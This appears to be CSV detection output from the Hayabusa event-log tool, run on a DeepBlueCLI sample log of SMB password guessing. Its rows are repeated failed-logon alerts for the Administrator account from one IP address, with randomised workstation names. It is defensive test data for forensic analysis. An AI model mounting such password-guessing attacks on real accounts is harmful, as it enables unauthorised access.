NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNeC1BBFVXv839Ys : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: juXXpQcoPfJLMQ3L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: njNdv4lGnsUpooCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j6VchLhWJT7cCWVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r3xxnFpbd8zkFm0h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtf156NEpOebQHGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17O1jfGX6KQMPgnD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NaqTqrCiPPfNxZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Az7cwIWXUGVIMTv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Djaxf99PVs2VkMy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbTSoTdaQ0Y4c9Gw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g9aTo4QBHfrgPYZ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dpHKjYzZTn0ruIrf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HqhPnV6tc8airRqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RIOCqtXh5ji12U5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwuGZ0kgg1yToLlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZSBbd4qBRuzeKBjD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zS1Muxc9gpcqv23 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c6wiIkfkgtso42P1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1ilRmhSB5RfvpVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PuQ47GGBraimypWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UfUsAYWilbwMScpE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22ZSltGNwIl0DNDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IYwG9IUpdk5DmM8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a8kbGxQFHDBodGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KoLqIaO8p3k9kOkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUnonSx3ZBdkyGhu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1QJziwKhsaJljGV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZhcNRrpODYB9jZxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yi5JE53caVn7n54w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jx6qTASzFp830ud6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4L8HtBWlmAMTjCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4hVfTwibHreepku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3TlapK211UT8SO0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mzzw3uPkn2cgtmlF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aPnfUjwJei5E5BD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mm1k0eeKAYokIbDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w8TDNcJ3LMyNtUe1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogKKslkdXvc9f130 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgoy6gMfe5N0UiP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfjf3d6I8TsBOzvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vs8DG8s81oOwYoI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LFkgN1aDoYkQ4qrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KMwLokYpcFIYHegd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oKradBV4ERsQnKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qPzlzfmgrbYTKqQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKYlBm2lhobHzbjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBMu96oqO9tb3f4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO04Q3eYdzyuy51v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FrIa2UrSrfdhkDCx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axhhyMrGl95O16Vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atjvfi8QeEDluhL2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HPBZKUiiKeyQwSr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2SmitfyjO4mxqw5E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nrq1g8ktTQbPTXqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 943GV3t1muba5IQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPVd28zf85AxdGqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D6evoSSxcKkHspuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C4fznmrnIdUH7DzG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwrrYjUV41P0K5Jh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4RBZrALEnH5BKP9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LU6uWH4gs4iHP7rV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCfhZDAH8ufk77zN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TE9pw4UeRldGeKVc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8PKE05MqxE5TwXT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GIE5fmddOPBbCM3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pveyo4Czx6KWKCGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPyyHaRnBec7Qg2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3b8mudJp5mdkiEW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Y6mjLaCzR28Q2qK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dMsNKWEjeCYYQVqw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7c5fENhkwO6QfEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cr1wAeMhPgVpwV82 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErpp9Ww6LO37C9k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYsNpBsGT5zOKe3p : IP Address: 192.168.198.149 : AuthPackage: 